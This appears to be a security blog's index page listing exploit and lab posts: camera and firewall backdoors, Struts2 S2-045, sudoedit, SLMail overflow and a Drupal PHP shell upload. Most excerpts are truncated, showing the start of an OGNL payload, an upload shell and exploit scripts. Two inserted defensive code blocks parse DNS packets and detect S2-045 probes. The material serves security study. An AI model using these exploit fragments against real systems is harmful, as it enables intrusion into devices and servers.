Vulnerability Analysis
Nixawk
exploit - dahua camera backdoor
Just for security assessment. If you can exploit the dahua camera devices, username/password/cookies can be used to access camera video.
Exploit Code
I'll share it later.
$ python exploit_dahua.py 192.168
Original · 2017-03-17 17:13:15 · 11065 views · 0 comments
Network - Wireshark decrypts SSL Traffic
Step one – set up an SSL-protected server to use as a testbed
To illustrate the process, we're going to use OpenSSL to generate a certificate and act as a web server running HTTP over SSL (aka HTTPS) –
Reposted · 2015-10-18 15:05:29 · 836 views · 0 comments
Security Lab
The following table gives the URLs of all the vulnerable web applications, operating system installations, old software and war games [hacking] sites. The URLs for individual applications that are part of o
Original · 2014-08-10 22:40:16 · 2497 views · 0 comments
CVE-2015-2509
Please enable Windows Media Center from Media Features.
# Title: MS15-100 Windows Media Center Command Execution
# Date : 11/09/2015
# Author: R-73eN
# Software: Windows Media Center
# Tested : Windows 7
Original · 2015-09-14 08:56:31 · 552 views · 0 comments
exploit - Sudo <=1.8.14 - Unauthorized Privilege Escalation
# Exploit Title: sudo -e - a.k.a. sudoedit - unauthorized privilege escalation
# Date: 07-23-2015
# Exploit Author: Daniel Svartman
# Version: Sudo <=1.8.14
# Tested on: RHEL 5/6/7 and Ubuntu (all ver
Original · 2015-08-06 16:15:26 · 792 views · 0 comments
UPnP
What is UPnP
From Wikipedia: Universal Plug and Play (UPnP) is a set of networking protocols that permits networked devices, such as personal computers, printers, Internet gateways, Wi-Fi access points
Original · 2015-08-04 08:32:07 · 1664 views · 0 comments
Lab - Darknet
Please do it yourself. Really nice job!
Dir Bruter
Permission Check
Virtual Host
SQLite Injection / GetShell
XPath Injection
Crack PIN / Upload File
Suphp
References
https://research.g0blin.co.uk/vul
Original · 2015-07-16 16:13:30 · 966 views · 0 comments
Lab - ROP Primer
Download
http://download.vulnhub.com/rop-primer/rop-primer-v0.2.ova
Exploit
level0@rop:~$ cat exploit.py
#!/usr/bin/env python2
# -*- coding: utf8 -*-
import struct
def p(x): return struct.pack('<L', x
Reposted · 2015-07-14 00:56:45 · 2264 views · 0 comments
Lab - Hackademic RTB2
Description
Hackademic RTB2 is the second edition of the Hackademic vulnerable Virtual Machine. The first challenge is described here.
Installation
Hackademic RTB2 can be downloaded from the following places:
ht
Original · 2015-07-12 11:34:25 · 3851 views · 0 comments
python - scapy - fuzz
Start a TCP sniffer and monitor the TCP responses; sometimes we find surprises.
>>> sniff(prn=lambda x:x.show(), filter="(tcp port 80) and (ip dst 192.168.1.107 or ip src 192.168.1.107)")
###[ Etherne
Original · 2015-05-24 12:19:37 · 1780 views · 0 comments
Exploit writing tutorial Part 1: Stack Based Overflows
Author: Corelan Team (corelanc0d3r)
Modified by: Nixawk
This tutorial will show you how to exploit software through a stack overflow.
Requirements
Software: Easy RM to MP3 Converter Version 2.7.3.700.2006.09
Reposted · 2015-06-28 14:30:46 · 2318 views · 0 comments
python - scapy - dns sniffer / poisoning
How to parse DNS requests and responses? Scapy is a powerful tool, and it can help us with the DNS details.
#!/usr/bin/env python
# -*- coding: utf8 -*-
"""execute demo py with root privilege, and finish double
Original · 2015-05-23 11:38:09 · 6339 views · 0 comments
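An added example of the parsing this post describes, written against the raw RFC 1035 wire format with the standard library instead of Scapy (this is not the post's code). The two packets below are constructed by hand: transaction id 0x1234, question example.com/A, answer 192.0.2.1 (TEST-NET-1) using a compression pointer back to the question name, plus a forged response with a wrong transaction id to show the minimal check a resolver applies before accepting a poisoned answer.

```python
"""Minimal DNS message parser (RFC 1035 wire format), stdlib only.

Added example, not the original post's Scapy code. QUERY / RESPONSE / FORGED
are hand-constructed packets, not captured traffic.
"""
import struct

QTYPE_A = 1


def read_name(data, offset):
    """Decode a (possibly compressed) domain name starting at offset.
    Returns (name, offset_after_name_in_the_original_stream)."""
    labels = []
    jumped = False
    end = offset
    hops = 0
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:  # compression pointer (RFC 1035 4.1.4)
            pointer = struct.unpack_from("!H", data, offset)[0] & 0x3FFF
            if not jumped:
                end = offset + 2  # the pointer itself is 2 bytes long
            jumped = True
            offset = pointer
            hops += 1
            if hops > 16:  # guard against pointer loops in hostile packets
                raise ValueError("compression pointer loop")
            continue
        offset += 1
        if length == 0:  # root label terminates the name
            if not jumped:
                end = offset
            break
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), end


def parse_dns(data):
    """Parse header, question section and answer section of a DNS message."""
    txid, flags, qd, an, _ns, _ar = struct.unpack_from("!6H", data, 0)
    offset = 12
    questions = []
    for _ in range(qd):
        name, offset = read_name(data, offset)
        qtype, qclass = struct.unpack_from("!HH", data, offset)
        offset += 4
        questions.append((name, qtype, qclass))
    answers = []
    for _ in range(an):
        name, offset = read_name(data, offset)
        rtype, _rclass, ttl, rdlen = struct.unpack_from("!HHIH", data, offset)
        offset += 10
        rdata = data[offset:offset + rdlen]
        offset += rdlen
        if rtype == QTYPE_A and rdlen == 4:
            rdata = ".".join(str(b) for b in rdata)  # dotted quad
        answers.append((name, rtype, ttl, rdata))
    return {"id": txid, "is_response": bool(flags & 0x8000),
            "questions": questions, "answers": answers}


def response_matches_query(query, response):
    """Minimal resolver-side acceptance check: QR bit set, same transaction id,
    identical question section. A blind poisoning attempt that guesses the id
    wrong fails here; one that guesses right is why source-port randomisation
    and DNSSEC exist."""
    return (response["is_response"]
            and not query["is_response"]
            and response["id"] == query["id"]
            and response["questions"] == query["questions"])


# Constructed packets (not captured traffic).
QUERY = (b"\x12\x34"                          # transaction id
         b"\x01\x00"                          # flags: RD
         b"\x00\x01\x00\x00\x00\x00\x00\x00"  # QD=1 AN=0 NS=0 AR=0
         b"\x07example\x03com\x00"            # qname
         b"\x00\x01\x00\x01")                 # qtype A, qclass IN
RESPONSE = (b"\x12\x34"
            b"\x81\x80"                       # flags: QR, RD, RA
            b"\x00\x01\x00\x01\x00\x00\x00\x00"
            b"\x07example\x03com\x00\x00\x01\x00\x01"
            b"\xc0\x0c"                       # pointer to qname at offset 12
            b"\x00\x01\x00\x01"               # type A, class IN
            b"\x00\x00\x0e\x10"               # TTL 3600
            b"\x00\x04"                       # rdlength
            b"\xc0\x00\x02\x01")              # 192.0.2.1
FORGED = b"\x99\x99" + RESPONSE[2:]           # spoofed answer, wrong txid

if __name__ == "__main__":
    q, r = parse_dns(QUERY), parse_dns(RESPONSE)
    print(q, r, response_matches_query(q, r), response_matches_query(q, parse_dns(FORGED)))
```

The pointer handling is the part worth keeping: hostile packets can point a name at itself, so a hop limit belongs in any parser that consumes untrusted DNS.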
windbg - Getting Started with WinDBG - Part 2
This is a multipart series walking you through using WinDBG - we've gotten you off the ground with our last blog post, and now we'll focus on its core functionality so that you can start debugging pro
Reposted · 2015-06-24 18:22:12 · 734 views · 0 comments
windbg - Byakugan
1. Install Byakugan
lab:bin/ $ pwd
/home/someone/metasploit-framework/external/source/byakugan/bin
lab:bin/ $ tree
.
├── Vista
│   ├── byakugan.dll
│   ├── detoured.dll
│   └── injectsu.dll
├── Win7
│
Original · 2015-06-22 23:12:08 · 1560 views · 0 comments
Drupal - upload shell with admin privilege
Log in to Drupal with the admin username and password.
Enable PHP Filter
Add content with PHP Code
<?php
if(isset($_POST['Submit'])){
    $filedir = "";
    $maxfile = '2000000';
    $userfile_name = $_FILES[
Original · 2015-06-04 18:46:41 · 1572 views · 0 comments
windbg - Getting Started with WinDBG - Part 3
In this series of blog posts we've walked you through getting WinDBG installed and set up, and got you started by attaching to a process and setting breakpoints. Our next step is the actual debugging part
Reposted · 2015-06-24 19:50:51 · 631 views · 0 comments
windbg - Getting Started with WinDBG - Part 1
Introduction
WinDBG is an awesome debugger. It may not have a pretty interface or black background by default, but it is still one of the most powerful and stable Windows debuggers out there. In this artic
Reposted · 2015-06-24 15:52:24 · 1122 views · 0 comments
exploit - Immunity Debugger - PyCommands List
PyCommand    Description
=========    ===========
acrocache    Dumps Acrobat Reader Cache state
Original · 2015-06-23 20:57:27 · 907 views · 0 comments
Joomla - Error-Based SQL Injection
Description
Trustwave SpiderLabs researcher Asaf Orpani has discovered an SQL injection vulnerability in versions 3.2 through 3.4.4 of Joomla, a popular open-source Content Management System (CMS). CVE
Original · 2015-10-24 13:26:42 · 2086 views · 0 comments
AES
Encrypt / Decrypt Demos
Encryption:
openssl aes-256-cbc -in attack-plan.txt -out message.enc
or
openssl aes-256-cbc -in attack-plan.txt -a
or
┌─[✗]─[lab@core]─[/tmp]
└──╼ aescrypt -h
usage: aescrypt {-
Original · 2015-10-13 23:34:59 · 462 views · 0 comments
exploit - CVE-2017-5638 - Apache Struts2 S2-045
Metasploit-Framework
Exp Code
#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import httplib
def exploit(url, cmd):
    payload = "%{(#_='multipart/form-data')."
    payload += "(#dm=@ognl.OgnlCo
Original · 2017-03-07 17:13:45 · 5665 views · 1 comment
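As an added example, not the post's exploit code, a detection routine for the S2-045 vector this payload targets: the OGNL expression is carried in the Content-Type header, which Struts' Jakarta Multipart parser folds into an error message that is then evaluated. The requests below are constructed (host struts.example.test, a placeholder expression that does nothing); only the `%{(#_='multipart/form-data')` prefix comes from the post's payload.

```python
"""Detection for S2-045 (CVE-2017-5638) style probes: OGNL in Content-Type.

Added example, not code from the post. The sample requests are constructed;
the probe carries only the marker prefix the post's payload starts with plus
a no-op placeholder, not a working exploit string.
"""
import re

# An OGNL expression opens with %{ or ${ and, to do anything useful, touches
# OGNL variables or statics via '#' or '@' before the closing brace.
OGNL_MARKER = re.compile(r"[%$]\{[^}]*[#@]")


def parse_request_headers(raw):
    """Return (request_line, headers) for a raw HTTP/1.x request head.
    Header names are lower-cased; repeated headers are joined with ', '."""
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]
    lines = head.splitlines()
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            continue  # not a header line; ignore rather than fail the whole request
        key = name.strip().lower()
        value = value.strip()
        headers[key] = value if key not in headers else headers[key] + ", " + value
    return lines[0], headers


def is_s2_045_probe(raw):
    """True when the Content-Type header carries an OGNL expression."""
    _, headers = parse_request_headers(raw)
    return bool(OGNL_MARKER.search(headers.get("content-type", "")))


def scan(requests):
    """Return the request lines of the requests that look like S2-045 probes."""
    return [parse_request_headers(raw)[0] for raw in requests if is_s2_045_probe(raw)]


# Constructed samples (not captured traffic).
BENIGN_UPLOAD = (
    "POST /upload.action HTTP/1.1\r\n"
    "Host: struts.example.test\r\n"
    "Content-Type: multipart/form-data; boundary=----abc123\r\n"
    "Content-Length: 0\r\n\r\n"
)
PROBE = (
    "POST /upload.action HTTP/1.1\r\n"
    "Host: struts.example.test\r\n"
    "Content-Type: %{(#_='multipart/form-data').(#placeholder='no-op')}\r\n"
    "Content-Length: 0\r\n\r\n"
)
LOWERCASE_VARIANT = (
    "GET /index.action HTTP/1.1\r\n"
    "host: struts.example.test\r\n"
    "content-type: ${#placeholder}\r\n\r\n"
)

if __name__ == "__main__":
    print(scan([BENIGN_UPLOAD, PROBE, LOWERCASE_VARIANT]))
```

Match on the expression markers rather than on the exact payload prefix: `#_='multipart/form-data'` is only the trick that keeps the header parseable as multipart, and variants drop or reorder it. Detection is a stopgap; the fix is upgrading Struts to 2.3.32 or 2.5.10.1 or later.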
Router - Netgear Remote Command Injection
Description
NETGEAR is aware of the security issue #582384 that allows unauthenticated web pages to pass form input directly to the command-line interface. A remote attacker can potentially inject arbit
Original · 2016-12-15 14:33:27 · 656 views · 0 comments
Vuln - Cisco - CVE-2016-6415 - IKE Information Disclosure
Summary
A vulnerability in Internet Key Exchange version 1 (IKEv1) packet processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software could allow an unauthenticated, remote attacker to ret
Original · 2016-09-29 21:26:54 · 1479 views · 0 comments
Vuln - Cisco - CVE-2016-6366
https://github.com/RiskSense-Ops/CVE-2016-6366/
Exploit Cisco CVE-2016-6366
msf auxiliary(snmp_login) > set PASSWORD public
PASSWORD => public
msf auxiliary(snmp_login) > set RHOSTS 192.168.206.114
RHOST
Original · 2016-09-26 16:46:57 · 2969 views · 0 comments
vuln - SugarCRM 6.5.23 - REST PHP Object Injection Exploit
Deploy a vuln lab
Please install docker yourself.
#!/bin/bash
docker build -t sugarcrm:CVE-2016-7124 -f Dockerfile .
docker run -p 3306:3306 -p 80:80 sugarcrm:CVE-2016-7124
Dockerfile
# docker php tag list
Original · 2016-09-15 00:07:05 · 1293 views · 0 comments
How to scan the whole Internet (3.7 billion IP addresses) in a few minutes?
Cyber security audit and ethical hacking training professionals normally use a scanner to scan networks. Scanning every IP address on the internet isn't an easy job, and if you don't have the resour
Reposted · 2016-09-12 18:13:49 · 596 views · 0 comments
exploit - SLMail 5.5 - POP3 PASS Buffer Overflow Exploit
https://www.exploit-db.com/exploits/638/
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
import socket
import struct
#
# OS Name: Microsoft Windows XP Professional
# OS Version:
Original · 2016-07-26 22:30:52 · 3268 views · 0 comments
exploit - ClamAV servers vulnerable to unauthenticated clamav command execution
ClamAV® is an open source antivirus engine for detecting trojans, viruses, malware & other malicious threats.
Setup ClamAV Environment
$ sudo apt-get install clamav clamav-daemon
$ sudo freshclam
$ sudo
Original · 2016-06-14 10:51:14 · 951 views · 0 comments
CVE-2015-7755: Juniper ScreenOS Authentication Backdoor
On December 18th, 2015 Juniper issued an advisory indicating that they had discovered unauthorized code in the ScreenOS software that powers their Netscreen firewalls. This advisory covered two distinc
Reposted · 2015-12-21 21:44:53 · 1768 views · 0 comments
Fuzz - Sulley Framework
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 3 Build 2600
Install Sulley Framework
https://github.com/OpenRCE/sulley/wiki/Windows-Installa
Original · 2016-03-10 16:36:30 · 1904 views · 0 comments
Vuln - Synology NAS DSM 5.2 Remote Code Execution (RCE)
TLDR
RCE in Synology NAS DSM 5.2 due to lack of input sanitisation. RCE triggered indirectly via the port forwarding mechanism in the NAS UI.
Getting started
I recently bought a Synology DS416 NAS and noticed
Reposted · 2016-02-23 13:04:28 · 2104 views · 0 comments
Lab - ElasticSearch Search Groovy Sandbox Bypass
Download: https://www.elastic.co/downloads/past-releases/elasticsearch-1-4-0
Elasticsearch is a search server based on Lucene. It provides a distributed, multitenant-capable full-text search engine with
Original · 2016-03-05 08:48:57 · 2061 views · 0 comments
Exploit - Fortigate SSH Backdoor
root@Exploit-Fortigate-SSH-Backdoor:~# python fortigate.py 192.168.1.100
DEBUG:paramiko.transport:starting thread (client mode): 0xb6f81e0cL
DEBUG:paramiko.transport:Local version/idstring: SSH-2.0-par
Original · 2016-01-15 00:37:25 · 2041 views · 0 comments
Lab - Install OpenNMS on Kali Linux
Once OpenNMS is installed successfully, you can access the web page at http://localhost:8980 with the credentials admin / admin.
Download OpenNMS
Access the page and download the related files:
- openNMS
- jicmp
Original · 2016-02-14 17:44:30 · 1757 views · 0 comments
Basic Linux Privilege Escalation
Before starting, I would like to point out - I'm no expert. As far as I know, there isn't a "magic" answer, in this huge area. This is simply my finding, typed up, to be shared (my starting point). Bel
Reposted · 2014-08-27 20:01:10 · 1607 views · 0 comments
Remote Debugging with IDA Pro
How to debug a Linux program on Windows?
Windows: (IP: 192.168.1.105)
Linux: (IP: 192.168.1.103)
Windows (IDA Pro)
Install IDA Pro 6.8 on Windows.
Create a shared folder linux in C:\PROGRA~1\IDA6.8
copy li
Original · 2016-01-21 15:04:38 · 1348 views · 0 comments
Metasploit - jenkins_java_deserialize
Stand up a Jenkins server version 1.637 or lower:
wget http://mirrors.jenkins-ci.org/war/1.637/jenkins.war
java -jar jenkins.war
Run the following exploit in msfconsole:
use exploit/linux/misc/jenkins_java
Reposted · 2015-12-12 13:05:43 · 1427 views · 0 comments
exploit - write metasploit exploit script
Create Vuln Server
Compile the source code with VC6.0 / Dev C++.
#include <iostream.h>
#include <stdio.h>
#include <winsock.h>
#include <windows.h>
//load windows socket
#pragma comment(lib, "wsock32.lib
Original · 2015-06-22 19:23:33 · 1663 views · 1 comment
exploit - mona.py - the manual
mona.py
Install mona.py
Put mona.py into C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands
Basic usage
Open Immunity Debugger. At the bottom of the application you should see an input box (comm
Original · 2015-02-27 14:07:31 · 3638 views · 0 comments
connect wireless with command
iw (list/config) can only handle WEP. You need wpa_supplicant for this.
sudo apt-get install wpasupplicant
In /etc/wpa_supplicant.conf you put your SSID and password.
gksu gedit /etc/wpa_supplican
Original · 2014-09-11 22:23:28 · 1097 views · 0 comments